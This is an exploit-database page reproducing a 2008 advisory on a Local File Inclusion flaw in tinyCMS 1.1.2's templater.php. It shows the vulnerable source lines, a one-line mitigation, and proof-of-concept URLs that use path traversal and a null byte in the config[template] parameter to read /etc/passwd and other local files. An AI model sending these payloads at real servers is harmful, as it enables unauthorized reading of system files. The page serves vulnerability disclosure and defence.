header-logo
Suggest Exploit
vendor:
tinyCMS
by:
cOndemned
8.8
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: tinyCMS
Affected Version From: 1.1.2002
Affected Version To: 1.1.2002
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability

tinyCMS 1.1.2 is vulnerable to a Local File Inclusion vulnerability due to a lack of sanitization of user-supplied input. An attacker can exploit this vulnerability to include arbitrary local files on the server, such as the /etc/passwd file, by supplying a maliciously crafted value for the 'config[template]' parameter in a request to the 'templater.php' script.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in file operations.
Source

Exploit-DB raw data:

########################################################################################
#
#   Name        :   tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability
#   Author      :   cOndemned [ Dark-Coders ]
#   Greetz      :   Avantura, str0ke, ZaBeaTy, doctor, voo|doo, sid.psycho, irk4z
#   Conditions  :   Magic quotes gpc = Off / Register Globals = On
#   Other info  :   Prior versions probably are vulnerable too
#
########################################################################################

Source of /modules/ZZ_Templater/templater.php

    [ ... ]
    
    17.     $ftemplatedir = 'templates/'.$config['template'].'/';
    18.     include('templates/'.$config['template'].'/data.php');      // <--- LFI
    19.     if($tdata['useblocks'] == 1)
    
    [ ... ]
    

Proof of Concept :

    http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00
    http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00
    

Jusf 4 fun    

# milw0rm.com [2008-08-21]

Navigation

Suggest Exploit

Services By CQR